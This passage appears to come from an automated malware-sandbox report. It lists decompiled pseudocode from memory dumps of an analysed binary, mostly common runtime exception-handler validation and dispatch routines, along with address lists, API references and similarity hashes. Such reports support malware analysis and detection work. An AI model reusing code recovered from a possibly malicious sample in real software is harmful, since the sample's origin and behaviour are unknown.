						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6e1a41f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6e1a4240 = 1;
										__eflags =  *0x6e1a4240;
										if( *0x6e1a4240 != 0) {
											goto L60;
										}
										_t84 =  *0x6e1a41f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6e1a4240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6e1a41f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6e1a4200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6e1a41fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6e1a4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e1a4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6e1a4240 = 1;
							__eflags =  *0x6e1a4240;
							if( *0x6e1a4240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6e1a4200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6e1a4200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6e1a4240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6e1a4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6e1a41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6e1a4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e1a4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6e1a23df
0x6e1a23e2
0x6e1a23e8
0x6e1a2406
0x00000000
0x6e1a2406
0x6e1a23f0
0x6e1a23f9
0x6e1a23ff
0x6e1a240e
0x6e1a2411
0x6e1a2414
0x6e1a241e
0x6e1a241e
0x6e1a2420
0x6e1a2423
0x6e1a2425
0x6e1a2425
0x6e1a2427
0x6e1a242a
0x00000000
0x00000000
0x6e1a242c
0x6e1a242e
0x6e1a2494
0x6e1a2494
0x6e1a25f2
0x00000000
0x6e1a25f2
0x6e1a2430
0x6e1a2430
0x6e1a2434
0x6e1a2436
0x6e1a2436
0x6e1a2436
0x6e1a2436
0x6e1a2439
0x6e1a243a
0x6e1a243d
0x6e1a243d
0x6e1a2441
0x6e1a2445
0x6e1a2453
0x6e1a2453
0x6e1a245b
0x6e1a2461
0x6e1a2463
0x6e1a2465
0x6e1a2475
0x6e1a2482
0x6e1a2486
0x6e1a248b
0x6e1a248d
0x6e1a250b
0x6e1a250b
0x6e1a248f
0x6e1a248f
0x6e1a248f
0x6e1a250d
0x6e1a250f
0x6e1a25f0
0x6e1a25f0
0x00000000
0x6e1a2515
0x6e1a2515
0x6e1a251c
0x00000000
0x00000000
0x6e1a2522
0x6e1a2526
0x6e1a2582
0x6e1a2584
0x6e1a258c
0x6e1a258e
0x6e1a2590
0x00000000
0x00000000
0x6e1a2592
0x6e1a2598
0x6e1a259a
0x6e1a259c
0x6e1a25b1
0x6e1a25b1
0x6e1a25b3
0x6e1a25e2
0x6e1a25e9
0x00000000
0x6e1a25e9
0x6e1a25b7
0x6e1a25b8
0x6e1a25ba
0x6e1a25bc
0x6e1a25bc
0x6e1a25be
0x6e1a25c0
0x6e1a25c2
0x6e1a25d6
0x6e1a25d6
0x6e1a25d9
0x6e1a25db
0x6e1a25db
0x6e1a25dc
0x6e1a25dc
0x00000000
0x6e1a25c4
0x6e1a25c4
0x6e1a25c4
0x6e1a25cd
0x6e1a25ce
0x6e1a25d0
0x6e1a25d2
0x6e1a25d2
0x00000000
0x6e1a25c4
0x6e1a25c2
0x6e1a259e
0x6e1a25a5
0x6e1a25a5
0x6e1a25a7
0x00000000
0x00000000
0x6e1a25a9
0x6e1a25aa
0x6e1a25ad
0x6e1a25af
0x00000000
0x00000000
0x00000000
0x6e1a25af
0x00000000
0x6e1a25a5
0x6e1a2528
0x6e1a252b
0x6e1a2530
0x00000000
0x00000000
0x6e1a2539
0x6e1a253b
0x6e1a2541
0x00000000
0x00000000
0x6e1a2547
0x6e1a254d
0x00000000
0x00000000
0x6e1a2553
0x6e1a2555
0x6e1a255e
0x6e1a2562
0x00000000
0x00000000
0x6e1a2568
0x6e1a256b
0x6e1a256d
0x00000000
0x00000000
0x6e1a2574
0x6e1a2576
0x00000000
0x00000000
0x6e1a2578
0x6e1a257c
0x00000000
0x00000000
0x00000000
0x6e1a257c
0x00000000
0x00000000
0x00000000
0x6e1a2467
0x6e1a2467
0x6e1a2467
0x6e1a246e
0x00000000
0x00000000
0x6e1a2470
0x6e1a2471
0x6e1a2473
0x00000000
0x00000000
0x00000000
0x6e1a2473
0x6e1a249b
0x6e1a249d
0x00000000
0x00000000
0x6e1a24ad
0x6e1a24af
0x6e1a24b1
0x00000000
0x00000000
0x6e1a24b7
0x6e1a24be
0x6e1a24ea
0x6e1a24ea
0x6e1a24ec
0x6e1a24ee
0x6e1a2502
0x6e1a2504
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1a24f0
0x6e1a24f0
0x6e1a24f0
0x6e1a24f9
0x6e1a24fa
0x6e1a24fc
0x6e1a24fe
0x6e1a24fe
0x00000000
0x6e1a24f0
0x6e1a24c0
0x6e1a24c3
0x6e1a24c5
0x6e1a24d7
0x6e1a24d7
0x6e1a24da
0x6e1a24dc
0x6e1a24dc
0x6e1a24dd
0x6e1a24dd
0x6e1a24e3
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1a24c7
0x6e1a24c7
0x6e1a24c7
0x6e1a24ce
0x00000000
0x00000000
0x6e1a24d0
0x6e1a24d0
0x6e1a24d1
0x00000000
0x00000000
0x00000000
0x6e1a24d1
0x6e1a24d3
0x6e1a24d5
0x6e1a24e8
0x00000000
0x00000000
0x00000000
0x6e1a24e8
0x00000000
0x6e1a24d5
0x6e1a2447
0x6e1a244a
0x6e1a244d
0x00000000
0x00000000
0x6e1a244f
0x6e1a2451
0x00000000
0x00000000
0x00000000
0x6e1a2451
0x6e1a2416
0x6e1a2418
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E1A2486

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 7a056fa16b82c99f678e6ef9a7f54cdec6857ff03859d245a3e81d19ff501de1
Instruction ID: 467db80d32e8f97d0716d623a3165feedec3486b385fa0f4d789ce56ab0c1b1c
Opcode Fuzzy Hash: 7a056fa16b82c99f678e6ef9a7f54cdec6857ff03859d245a3e81d19ff501de1
Instruction Fuzzy Hash: 356182B8714602CFE759DBAED8A06B933A6FBA5314B34842DDB16C7584F730D8C2E650

Uniqueness

Uniqueness Score: -1.00%

Function 00B0B149, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0B149(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xb0d318; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xb0d360 = 1;
										__eflags =  *0xb0d360;
										if( *0xb0d360 != 0) {
											goto L60;
										}
										_t84 =  *0xb0d318; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xb0d360 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xb0d318 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xb0d320 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xb0d31c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xb0d320 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xb0d320 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xb0d360 = 1;
							__eflags =  *0xb0d360;
							if( *0xb0d360 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xb0d320 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xb0d320 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xb0d360 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xb0d320 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xb0d318 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xb0d320 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xb0d320 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x00b0b153
0x00b0b156
0x00b0b15c
0x00b0b17a
0x00000000
0x00b0b17a
0x00b0b164
0x00b0b16d
0x00b0b173
0x00b0b182
0x00b0b185
0x00b0b188
0x00b0b192
0x00b0b192
0x00b0b194
0x00b0b197
0x00b0b199
0x00b0b199
0x00b0b19b
0x00b0b19e
0x00000000
0x00000000
0x00b0b1a0
0x00b0b1a2
0x00b0b208
0x00b0b208
0x00b0b366
0x00000000
0x00b0b366
0x00b0b1a4
0x00b0b1a4
0x00b0b1a8
0x00b0b1aa
0x00b0b1aa
0x00b0b1aa
0x00b0b1aa
0x00b0b1ad
0x00b0b1ae
0x00b0b1b1
0x00b0b1b1
0x00b0b1b5
0x00b0b1b9
0x00b0b1c7
0x00b0b1c7
0x00b0b1cf
0x00b0b1d5
0x00b0b1d7
0x00b0b1d9
0x00b0b1e9
0x00b0b1f6
0x00b0b1fa
0x00b0b1ff
0x00b0b201
0x00b0b27f
0x00b0b27f
0x00b0b203
0x00b0b203
0x00b0b203
0x00b0b281
0x00b0b283
0x00b0b364
0x00b0b364
0x00000000
0x00b0b289
0x00b0b289
0x00b0b290
0x00000000
0x00000000
0x00b0b296
0x00b0b29a
0x00b0b2f6
0x00b0b2f8
0x00b0b300
0x00b0b302
0x00b0b304
0x00000000
0x00000000
0x00b0b306
0x00b0b30c
0x00b0b30e
0x00b0b310
0x00b0b325
0x00b0b325
0x00b0b327
0x00b0b356
0x00b0b35d
0x00000000
0x00b0b35d
0x00b0b32b
0x00b0b32c
0x00b0b32e
0x00b0b330
0x00b0b330
0x00b0b332
0x00b0b334
0x00b0b336
0x00b0b34a
0x00b0b34a
0x00b0b34d
0x00b0b34f
0x00b0b34f
0x00b0b350
0x00b0b350
0x00000000
0x00b0b338
0x00b0b338
0x00b0b338
0x00b0b341
0x00b0b342
0x00b0b344
0x00b0b346
0x00b0b346
0x00000000
0x00b0b338
0x00b0b336
0x00b0b312
0x00b0b319
0x00b0b319
0x00b0b31b
0x00000000
0x00000000
0x00b0b31d
0x00b0b31e
0x00b0b321
0x00b0b323
0x00000000
0x00000000
0x00000000
0x00b0b323
0x00000000
0x00b0b319
0x00b0b29c
0x00b0b29f
0x00b0b2a4
0x00000000
0x00000000
0x00b0b2ad
0x00b0b2af
0x00b0b2b5
0x00000000
0x00000000
0x00b0b2bb
0x00b0b2c1
0x00000000
0x00000000
0x00b0b2c7
0x00b0b2c9
0x00b0b2d2
0x00b0b2d6
0x00000000
0x00000000
0x00b0b2dc
0x00b0b2df
0x00b0b2e1
0x00000000
0x00000000
0x00b0b2e8
0x00b0b2ea
0x00000000
0x00000000
0x00b0b2ec
0x00b0b2f0
0x00000000
0x00000000
0x00000000
0x00b0b2f0
0x00000000
0x00000000
0x00000000
0x00b0b1db
0x00b0b1db
0x00b0b1db
0x00b0b1e2
0x00000000
0x00000000
0x00b0b1e4
0x00b0b1e5
0x00b0b1e7
0x00000000
0x00000000
0x00000000
0x00b0b1e7
0x00b0b20f
0x00b0b211
0x00000000
0x00000000
0x00b0b221
0x00b0b223
0x00b0b225
0x00000000
0x00000000
0x00b0b22b
0x00b0b232
0x00b0b25e
0x00b0b25e
0x00b0b260
0x00b0b262
0x00b0b276
0x00b0b278
0x00000000
0x00000000
0x00000000
0x00000000
0x00b0b264
0x00b0b264
0x00b0b264
0x00b0b26d
0x00b0b26e
0x00b0b270
0x00b0b272
0x00b0b272
0x00000000
0x00b0b264
0x00b0b234
0x00b0b234
0x00b0b237
0x00b0b239
0x00b0b24b
0x00b0b24b
0x00b0b24e
0x00b0b250
0x00b0b250
0x00b0b251
0x00b0b251
0x00b0b257
0x00b0b257
0x00000000
0x00000000
0x00000000
0x00000000
0x00b0b23b
0x00b0b23b
0x00b0b23b
0x00b0b242
0x00000000
0x00000000
0x00b0b244
0x00b0b244
0x00b0b245
0x00000000
0x00000000
0x00000000
0x00b0b245
0x00b0b247
0x00b0b249
0x00b0b25c
0x00000000
0x00000000
0x00000000
0x00b0b25c
0x00000000
0x00b0b249
0x00b0b1bb
0x00b0b1be
0x00b0b1c1
0x00000000
0x00000000
0x00b0b1c3
0x00b0b1c5
0x00000000
0x00000000
0x00000000
0x00b0b1c5
0x00b0b18a
0x00b0b18c
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00B0B1FA

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 8d8f9301c2dcfcf99376bc72620717d94a2c1872dfc0de9c1d55a77d1c4e689a
Instruction ID: cecc668c5c0471b3ce21a5824afc92d695b03c4ab4a8e88c139f6b5ae4cedadb
Opcode Fuzzy Hash: 8d8f9301c2dcfcf99376bc72620717d94a2c1872dfc0de9c1d55a77d1c4e689a
Instruction Fuzzy Hash: 7361BD31A106029FDB29CF29C890E397FE2FB95754B24C1E9D812DB2E1E731DD428748

Uniqueness

Uniqueness Score: -1.00%

Function 00B561D5, Relevance: 1.6, Strings: 1, Instructions: 353COMMON

Download Yara Rule

Strings

@, xrefs: 00B56525

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 583c34fef7cd96b5a7fa4305c78963d3e7fe89fc884d5e617915b782d51d7e5b
Instruction ID: b300ce0b76f18e6288a672419525987f56f8e84f846d35e6317c2f3c2d96a8f4
Opcode Fuzzy Hash: 583c34fef7cd96b5a7fa4305c78963d3e7fe89fc884d5e617915b782d51d7e5b
Instruction Fuzzy Hash: BDE17871900219CBCF19CFA8D5907EEBBF1FF94305F6481A9EC52A7290E7349A59CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B662DC, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(00000000), ref: 00B662F4

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: ErrorStatus
String ID:
API String ID: 1596131371-0
Opcode ID: 02a4073839a26bb44012631e4be0af13feb6d8e880d2c0961a9095135343e10d
Instruction ID: 2c884bd08ec51ea65f8d40d55cc6d386e6e107fd8661f27531922eb66ff5c0e1
Opcode Fuzzy Hash: 02a4073839a26bb44012631e4be0af13feb6d8e880d2c0961a9095135343e10d
Instruction Fuzzy Hash: 17C0123250A203ABDF49AB50DC28E2A7B61FBA4341F00882CB54A82870CF349890CB10

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A21B4, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6E1A21B4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6E1A231B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6E1A23D5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6E1A22C0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6E1A231B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6E1A23B7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6e1a21b8
0x6e1a21b9
0x6e1a21ba
0x6e1a21bd
0x6e1a21bf
0x6e1a21c2
0x6e1a21c3
0x6e1a21c5
0x6e1a21c6
0x6e1a21c7
0x6e1a21ca
0x6e1a21d4
0x6e1a2285
0x6e1a228c
0x6e1a2295
0x6e1a21da
0x6e1a21da
0x6e1a21e0
0x6e1a21e6
0x6e1a21e9
0x6e1a21ec
0x6e1a21f0
0x6e1a21f5
0x6e1a21fa
0x6e1a227a
0x00000000
0x6e1a21fc
0x6e1a21fc
0x6e1a2208
0x6e1a220a
0x6e1a2265
0x6e1a2265
0x6e1a226b
0x00000000
0x6e1a220c
0x6e1a221b
0x6e1a221d
0x6e1a221e
0x6e1a221f
0x6e1a2222
0x6e1a2222
0x6e1a2224
0x00000000
0x6e1a2226
0x6e1a2226
0x6e1a2270
0x6e1a2228
0x6e1a2228
0x6e1a222c
0x6e1a2234
0x6e1a2239
0x6e1a223e
0x6e1a224a
0x6e1a2252
0x6e1a2259
0x6e1a225f
0x6e1a2263
0x00000000
0x6e1a2263
0x6e1a2226
0x6e1a2224
0x00000000
0x6e1a220a
0x6e1a227e
0x6e1a227e
0x6e1a227e
0x6e1a21fa
0x6e1a229a
0x6e1a22a1

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
